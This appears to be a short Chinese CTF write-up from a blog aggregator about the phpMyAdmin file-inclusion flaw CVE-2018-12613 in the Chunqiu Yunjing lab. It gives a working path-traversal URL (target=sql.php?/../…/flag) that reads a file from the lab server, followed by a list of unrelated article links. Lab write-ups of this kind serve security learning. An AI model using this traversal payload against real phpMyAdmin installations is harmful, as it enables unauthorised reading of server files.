当前位置: 首页 > news >正文

春秋云境CVE-2018-12613

news 2026/5/24 21:04:37

1.阅读靶场介绍

index.php中存在一处文件包含逻辑

可以理解为对url做处理

能想到的就是../../../../../flag

2.启动靶场

如上图所示

看到这个界面我想到的就是select flag from flag出来

但是本博主没有找到哟

期待各位大神的评论

3.poc

这里博主是通过这个处理过的url夺旗的

如下所示

url在这里哟

各位可以参考参考哟

https://eci-2ze8e04kno5d57s1geyi.cloudeci1.ichunqiu.com:80/?target=sql.php?/../../../../../../../../flag

到此,相信各位都完成夺旗了

感谢您宝贵的时间

http://www.jsqmd.com/news/587287/

相关文章:

  • 终极指南:如何用HunterPie快速打造你的《怪物猎人:世界》个性化游戏界面
  • GCP 项目 IAM 与结算账号管理指南
  • ThinkCMF6 菜单名称修改:两种方法轻松搞定
  • 如何高效构建雷达系统:Python雷达模拟的完整实战指南
  • 深圳高端表维修避坑指南:华润大厦504揭秘百达翡丽等36品牌维修陷阱 - 时光修表匠
  • Claude 和 GPT 可以怎么搭?一个多模型调用示例讲清楚
  • 2026 上海网线回收厂家 排名及实用价值解析
  • 代码分享 | 单细胞系统药理学研究典范,破解急性淋巴细胞白血病治疗的耐药难题
  • 解压缩软件分享-Banizip
  • 深圳高端腕表维修避坑指南:30+奢华品牌案例与6城服务对比 - 时光修表匠
  • 开发工具试用期突破技术:基于文件系统权限控制的永久授权方案解析
  • c语言算数运算
  • 2026年市场优秀的详情页设计公司怎么选择,IP设计/餐饮品牌全案设计/食品包装设计,详情页设计工作室口碑推荐 - 品牌推荐师
  • 2026届最火的十大降重复率平台实际效果
  • 2026 年志愿填报服务商大揭秘,究竟哪家技术称王?
  • Z-Image-Turbo-rinaiqiao-huiyewunv保姆级教程:如何将本地Turbo模型接入Discord Bot提供绘图服务
  • 宝珀官方售后服务中心新址实地考察报告(2026年4月最新版) - 亨得利官方服务中心
  • 医疗器械行业实施六西格玛MBB认证的5个生死线:一个CE认证失败的血泪教训
  • OIBench与CoreCodeBench:揭示大模型编程能力的真实水平
  • 谷歌Gemini API分档计费,开发者调用如何渠道统计?
  • 5分钟掌握BilibiliDown:新手快速上手的B站视频下载指南
  • MapsUI-Kit上新:RoutePlan组件,从地点搜索到路径规划,加速构建您的地图Agent
  • 2026年4月行业内纵剪分条机品牌,市面上专业的纵剪分条机如何选优选实力品牌 - 品牌推荐师
  • 亲测马来西亚本科避坑复盘
  • 华硕笔记本性能控制新选择:G-Helper轻量级控制中心深度解析
  • ProperTree终极指南:三分钟上手跨平台plist编辑器
  • 数据仓库实战:实时数据分析与处理全解——技术架构、实现方案与性能优化
  • 百度网盘下载加速终极方案:免费解锁满速下载的完整指南
  • 交通运输部关于印发《交通运输综合应急预案》等5项突发事件应急预案的通知
  • 如何用Sunshine搭建终极游戏串流服务器:免费跨平台完整指南